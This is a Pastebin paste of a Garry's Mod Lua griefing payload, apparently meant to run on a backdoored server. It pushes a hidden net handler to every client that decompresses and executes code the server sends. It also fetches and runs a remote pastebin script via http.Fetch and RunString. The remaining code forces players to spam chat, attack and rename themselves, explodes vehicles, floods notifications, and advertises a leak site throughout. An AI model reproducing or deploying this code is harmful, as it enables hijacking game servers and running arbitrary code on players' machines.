Advertisement
Guest User

Untitled

a guest
May 26th, 2019
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.76 KB | None | 0 0
  1. print([[
  2. ������+ �������+��������+
  3. ��+----+ ��+----++--��+--+
  4. ��� ���+�����+ ���
  5. ��� �����+--+ ���
  6. +������++�������+ ���
  7. +-----+ +------+ +-+
  8. ���+ ��+ ������+ �������+ ������+ ������+ ������+ �������+
  9. ����+ �����+---��+��+----+��+----+��+---��+��+--��+��+----+
  10. ��+��+ ������ ����������+��� ��� ���������++�����+
  11. ���+��+������ ���+----������ ��� �����+---+ ��+--+
  12. ��� +�����+������++��������+������++������++��� �������+
  13. +-+ +---+ +-----+ +------+ +-----+ +-----+ +-+ +------+
  14.  
  15. By IXXE <3 https://gvacleak.tk ]])
  16.  
  17. for k, v in pairs(player.GetAll()) do
  18. v:SendLua("steamworks.FileInfo(1618885873,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  19. end
  20.  
  21. for k, v in pairs( player.GetAll() ) do
  22. if ( v:Alive() ) then
  23. v:GodEnable()
  24. else
  25. v:Spawn()
  26. timer.Simple( 5, function()
  27. v:GodEnable()
  28. end)
  29. end
  30. end
  31.  
  32.  
  33. game.AddParticles( "particles/enigma.pcf" )
  34. PrecacheParticleSystem("enigma")
  35.  
  36. local function rdm_str(len)
  37. if !len or len <= 0 then return '' end
  38. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  39. end
  40.  
  41. local net_string = rdm_str(25)
  42.  
  43. util.AddNetworkString(net_string)
  44. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  45. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  46. if !ply:IsBot() then
  47. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  48. end
  49. end)
  50.  
  51. local function SendToClient(code)
  52. local data = util.Compress(code)
  53. local len = #data
  54. net.Start(net_string)
  55. net.WriteUInt(len, 16)
  56. net.WriteData(data, len)
  57. net.Broadcast()
  58. end
  59. timer.Simple( 17, function()
  60. SendToClient([[
  61.  
  62. game.AddParticles( "particles/enigma.pcf" )
  63. PrecacheParticleSystem("enigma")
  64. hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)
  65.  
  66.  
  67. timer.Create("nonameplease", 5, 0,function()
  68. for i=1, #player.GetHumans() do
  69. local ply = player.GetHumans()[i]
  70. ply:Say( "/ooc SITE OU J'AI EU CECI : https://gvacleak.tk")
  71. end
  72. end)
  73.  
  74. local CreateModel = function(mdl, isragdoll)
  75. local ent
  76.  
  77. if isragdoll then
  78. ent = ClientsideRagdoll(mdl)
  79. else
  80. ent = ClientsideModel(mdl, RENDERGROUP_OTHER)
  81. end
  82.  
  83.  
  84. return ent
  85. end
  86.  
  87. local NewHookAdd = function(str, name, func)
  88. --name = "dronesrewrite_hell_hooks" .. name
  89. hook.Add(str, name, func)
  90.  
  91. table.insert(cache, {
  92. str = str,
  93. name = name
  94. })
  95. end
  96.  
  97. local cache = { }
  98. timercache = { }
  99. local Const = 0
  100. local Noise = nil
  101. local pl = LocalPlayer()
  102. timer.Create("charglogo", 2, 1, function()
  103. local dlight = DynamicLight(pl:EntIndex())
  104. if dlight then
  105. dlight.pos = Vector(-2224.216797, -2918.063721, 2354.03125)
  106. dlight.r = 255
  107. dlight.g = 0
  108. dlight.b = 0
  109. dlight.brightness = 16
  110. dlight.Decay = 1000
  111. dlight.Size = 2000
  112. dlight.DieTime = CurTime() + 2
  113. end
  114.  
  115. local pos = pl:GetPos() + Vector(0, 0, 120)
  116. local ang = Angle(0, pl:GetAngles().y, 0)
  117.  
  118. local tr = util.TraceLine({
  119. start = pos,
  120. endpos = pos + ang:Forward() * 86,
  121. filter = pl
  122. })
  123.  
  124. local rag_pos = tr.HitPos + tr.HitNormal * 3 - Vector(0, 0, 80)
  125.  
  126. for i = 1, 16 do
  127. sound.Play("vo/npc/Barney/ba_laugh04.wav", Vector( 0, 0, 0 ) )
  128. end
  129. for i = 1, 10 do
  130. ParticleEffectAttach("enigma",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  131. end
  132.  
  133. local mdl = CreateModel("models/food/hotdog.mdl")
  134. mdl:SetModelScale(5)
  135. mdl:SetAngles(ang + Angle(15, 180, 0))
  136. mdl:SetPos(rag_pos)
  137. mdl:Spawn()
  138.  
  139. --ParticleEffect("fire_test2", rag_pos, Angle(0, 0, 0))
  140.  
  141. hook.Add("CalcView", "dronesrewrite_doshit", function(ply, _pos, _ang, fov)
  142. local view = { }
  143. view.origin = pos + VectorRand()
  144. view.angles = ang
  145. view.fov = fov + math.random(-80, -50)
  146.  
  147. return view
  148. end)
  149.  
  150. timer.Create("charglo", 1.4, 1, function()
  151. mdl:Remove()
  152. hook.Remove("CalcView", "dronesrewrite_doshit")
  153. end)
  154. end)
  155. ]])
  156. end)
  157.  
  158. timer.Simple( 20, function()
  159. timer.Create( "gvacspaam", 0.1, 0, function()
  160. for k,v in pairs(player.GetAll()) do
  161. v:SendLua('RunConsoleCommand("impulse","100")')
  162. end
  163. end)
  164. hook.Add( 'SetupMove', 'auto hop', function( ply, move )
  165. if not ply:IsOnGround() then
  166. move:SetButtons( bit.band( move:GetButtons(), bit.bnot( IN_JUMP ) ) )
  167. end
  168. end )
  169. for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
  170.  
  171. local explo = ents.Create("env_explosion")
  172.  
  173. explo:SetPos(v:GetPos())
  174.  
  175. explo:SetKeyValue("iMagnitude", "300")
  176.  
  177. explo:Spawn()
  178.  
  179. explo:Activate()
  180.  
  181. explo:Fire("Explode", "", 0)
  182.  
  183. end
  184.  
  185. end
  186. for k,v in pairs(player.GetAll()) do
  187. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  188. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  189. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  190. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  191. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  192. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  193. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  194. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  195. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  196. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  197. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  198. v:ManipulateBoneScale( a, Vector(100,100,100))
  199. v:ManipulateBoneScale( b, Vector(100,100,100))
  200. v:ManipulateBoneScale( c, Vector(100,100,100))
  201. v:ManipulateBoneScale( d, Vector(100,100,100))
  202. v:ManipulateBoneScale( e, Vector(100,100,100))
  203. v:ManipulateBoneScale( f, Vector(100,100,100))
  204. v:ManipulateBoneScale( g, Vector(100,100,100))
  205. v:ManipulateBoneScale( h, Vector(100,100,100))
  206. v:ManipulateBoneScale( i, Vector(100,100,100))
  207. v:ManipulateBoneScale( j, Vector(100,100,100))
  208. v:ManipulateBoneScale( k, Vector(100,100,100))
  209. end
  210. SendToClient([[
  211.  
  212. surface.CreateFont( "PixelCutsceneScaled",{
  213. font = "Open Sans",
  214. size = 500,
  215. weight = 1000,
  216. antialias = true
  217. })
  218.  
  219. surface.CreateFont( "PixelSmall",{
  220. font = "Open Sans",
  221. size = 135,
  222. weight = 500,
  223. antialias = false
  224. })
  225. surface.CreateFont("lapolice", {
  226. font = "Open Sans",
  227. size = ScrW()*0.02,
  228. weight = 10,
  229. blursize = 0,
  230. scanlines = 2.5,
  231. antialias = false
  232. })
  233.  
  234. local function gettextcolor( a )
  235.  
  236. local r = 0.5*math.sin(RealTime()*5.5)*255 + 255/2
  237. local g = -0.5*math.sin(RealTime()*5.5)*255 + 255/2
  238. local b = 215
  239.  
  240. return Color( r, g, b, a or 255 )
  241.  
  242. end
  243.  
  244. local w,h = ScrW(), ScrH()
  245. local W, H = ScrW(), ScrH()
  246. local MySelf = LocalPlayer()
  247.  
  248. if ohno then
  249. ohno:Remove()
  250. ohno = nil
  251. end
  252.  
  253. ohno = vgui.Create( "DFrame" )
  254. ohno:SetSize( w, h )
  255. ohno:SetPos(0,0)
  256. ohno:SetDraggable ( false )
  257. ohno:SetTitle("")
  258. ohno:MakePopup();
  259. ohno:ShowCloseButton(false)
  260.  
  261. ohno.Paint = function( self )
  262. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  263. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  264. end
  265.  
  266. local pw, ph = w, h*0.6
  267. local px, py = w/2-pw/2, h/2-ph/2
  268.  
  269.  
  270. local Close = vgui.Create( "DButton", ohno )
  271. Close:SetPos(px, py)
  272. Close:SetText( "" )
  273. Close:SetSize( pw, ph )
  274. Close.Paint = function( self, tw, th )
  275.  
  276. local shift = math.sin(RealTime()*3)*1.5 + 5
  277.  
  278. local text = "https://gvacleak.tk"
  279. local text2 = "https://gvacleak.tk"
  280. local text3 = "https://gvacleak.tk"
  281. local text4 = "https://gvacleak.tk"
  282.  
  283. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, gettextcolor( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  284. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  285. draw.DrawText( "(?�?�)?? ???", "lapolice", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  286. draw.DrawText( "(?�?�)?? ???", "lapolice", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  287. draw.DrawText( "S", "lapolice", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  288. draw.DrawText( "S", "lapolice", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  289. draw.DrawText( "S", "lapolice", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  290. draw.DrawText( "S", "lapolice", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  291. draw.DrawText( "RIP ;)", "lapolice", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  292. draw.DrawText( "https://gvacleak.tk", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  293. draw.DrawText( "RIP ;)", "lapolice", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  294. draw.DrawText( "https://gvacleak.tk", "lapolice", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  295. draw.DrawText( "https://gvacleak.tk", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  296. draw.DrawText( "RIP ;)", "lapolice", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  297. draw.DrawText( "SNIGMA", "lapolice", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  298. draw.DrawText( "RIP ;)", "lapolice", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  299. draw.DrawText( "https://gvacleak.tk", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  300. draw.DrawText( "RIP ;)", "lapolice", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  301. draw.DrawText( "SNIGMA", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  302. draw.DrawText( "https://gvacleak.tk", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  303. draw.DrawText( "SNIGMA", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  304. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  305. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  306. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  307. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  308. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  309.  
  310. end
  311. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  312. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  313. timer.Create("fff", 0.1, 0, function()
  314. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  315. end)
  316.  
  317. timer.Simple( 15, function()
  318.  
  319. wut = vgui.Create( "DFrame" )
  320. wut:SetSize( w, h )
  321. wut:SetPos(0,0)
  322. wut:SetDraggable ( false )
  323. wut:SetTitle("")
  324. wut:ShowCloseButton(false)
  325.  
  326. wut.Paint = function( self )
  327. surface.SetDrawColor(30, 30, 30, 0)
  328. end
  329.  
  330. local Close = vgui.Create( "DButton", wut )
  331. Close:SetPos(px, py)
  332. Close:SetText( "" )
  333. Close:SetSize( pw, ph )
  334. Close.Paint = function( self, tw, th )
  335.  
  336. local shift = math.sin(RealTime()*3)*1.5 + 5
  337.  
  338. local text = "SNIGMA"
  339.  
  340. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, gettextcolor( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  341. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  342.  
  343. end
  344.  
  345. RunConsoleCommand("r_shader_srgb","1")
  346. RunConsoleCommand("gmod_language","ko")
  347. ohno:Remove()
  348. ohno = nil
  349.  
  350. local name = GetConVar("sv_skyname"):GetString()
  351. if name == "painted" then
  352. local sky
  353. for _, v in ipairs(ents.GetAll()) do
  354. if v:GetClass() == "env_skypaint" then
  355. sky = v
  356. break
  357. end
  358. end
  359. if !IsValid(sky) then return end
  360. hook.Add("PostRender","\xFFsky\xFF",function()
  361. local col = HSVToColor(CurTime()*30 % 360,1,1)
  362. col = Vector(col.r/255,col.g/255,col.b/255)
  363. sky:SetTopColor(col)
  364. sky:SetBottomColor(col)
  365. end)
  366. else
  367. local prefix = {"lf","ft","rt","bk","dn","up"}
  368. local mats = {}
  369. for i=1,6 do
  370. mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  371. end
  372. hook.Add("PostRender","\xFFsky\xFF",function()
  373. local col = HSVToColor(CurTime()*30 % 360,1,1)
  374. for i=1,6 do
  375. mats[i]:SetVector("$color",Vector(col.r/255,col.g/255,col.b/255))
  376. end
  377. end)
  378. end
  379. local chienchaud = ClientsideModel("models/food/hotdog.mdl")
  380. chienchaud:SetNoDraw(true)
  381. chienchaud:SetModelScale(120)
  382. timer.Create("charglogo", 0.01, 0, function()
  383. chienchaud:SetAngles(Angle(0, CurTime()*90 % 360 ,180) )
  384. end)
  385. --chienchaud:SetMaterial( "models/screenspace" )
  386. local data = {}
  387. local function genchienchaud(id)
  388. local pos = LocalPlayer():GetPos()
  389. data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  390. end
  391. for i=1, 150 do
  392. genchienchaud(i)
  393. end
  394. hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchienchauds\xFF",function()
  395. local z = LocalPlayer():GetPos().z
  396. for i=1, #data do
  397. chienchaud:SetPos(data[i][1])
  398. chienchaud:SetupBones()
  399. chienchaud:DrawModel()
  400. data[i][1].z = data[i][1].z - data[i][2] / 20
  401. if data[i][1].z <= z then
  402. genchienchaud(i)
  403. end
  404. end
  405. end)
  406.  
  407.  
  408.  
  409. end )
  410.  
  411.  
  412. sound.PlayURL( "https://gvacleak.tk/mlg.mp3", "mono noblock noplay", function( station )
  413. timer.Simple( 0.1, function()
  414. ClientStation = station
  415. station:EnableLooping( true )
  416. station:Play()
  417. station:SetVolume( 30 )
  418. end )
  419. end )
  420.  
  421. timer.Create("f", 0.11, 0, function()
  422. RunConsoleCommand("+attack")
  423. end)
  424. timer.Create("ff", 0.12, 0, function()
  425. RunConsoleCommand("-attack")
  426. end)
  427. ]])
  428. end)
  429.  
  430. timer.Create("ok", 1, 0, function()
  431. for k, v in pairs( ents.FindByClass( "prop_*" ) ) do local phys = v:GetPhysicsObject()
  432. if (IsValid(phys)) then
  433. phys:EnableMotion(true)
  434. end
  435. end
  436.  
  437. local props = ents.GetAll()
  438. for _, prop in ipairs( props ) do
  439. if(prop:GetPhysicsObject():IsValid()) then
  440. prop:GetPhysicsObject():ApplyForceCenter( Vector( 0, 0, ((650 * 0.73) * prop:GetPhysicsObject():GetMass() ) ) )
  441. end
  442. end
  443. end)
  444.  
  445.  
  446. timer.Simple( 20, function()
  447.  
  448. membresenigma =
  449. {
  450. "Pute",
  451. "IXXE",
  452. "Jodingue",
  453. "Pute",
  454. "Keeta",
  455. "DJTB",
  456. "Pute",
  457. "GET NO SCOPE !!!!",
  458. "https://gvacleak.tk",
  459. "GET NO SCOPE !!!!",
  460. "https://gvacleak.tk",
  461. "GET NO SCOPE !!!!",
  462. "https://gvacleak.tk",
  463. "GET NO SCOPE !!!!",
  464. "https://gvacleak.tk",
  465. "BAN HAMMER > https://bit.ly/2LUu3GN",
  466. "https://gvacleak.tk",
  467. "BAN HAMMER > https://bit.ly/2LUu3GN",
  468. "https://gvacleak.tk",
  469. "BAN HAMMER > https://bit.ly/2LUu3GN"
  470. }
  471.  
  472. timer.Create( "gvacspam", 0.2, 0, function()
  473. for k, ply in pairs( player.GetAll() ) do
  474. DarkRP.notify(ply, 2, 2, "[Oh No !] "..table.Random(membresenigma).."")
  475. end
  476. end)
  477.  
  478. local sun = ents.FindByClass("env_sun")
  479. if #sun == 0 then return end
  480. sun = sun[1]
  481. hook.Add("Think","\xFFsun\xFF",function()
  482. sun:SetKeyValue("sun_dir", math.sin(CurTime())/3 .. " " .. math.cos(CurTime())/3 .. " 0.901970")
  483. sun:SetModelScale(120)
  484. end)
  485.  
  486.  
  487. for k,v in pairs(player.GetAll()) do
  488. v:SetRunSpeed(400* 4);
  489. v:SetWalkSpeed(400 * 4);
  490. end
  491.  
  492.  
  493. timer.Create( "gtonip", 1, 0, function()
  494. for k,v in pairs(player.GetAll()) do
  495. v:GodEnable()
  496. v:setDarkRPVar( "rpname", "https://gvacleak.tk" )
  497. end
  498.  
  499. end )
  500.  
  501.  
  502. timer.Simple( 17, function()
  503. http.Fetch('https://pastebin.com/raw/7ABFD4Bu',function(b,l,h,c)RunString(b)end,nil)
  504. end )
  505.  
  506. end)
  507.  
  508.  
  509. timer.Create( "gvacspam", 0.1, 0, function()
  510. SendToClient([[
  511. print("https://gvacleak.tk !!")
  512. ]])
  513. print("https://gvacleak.tk !!")
  514. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement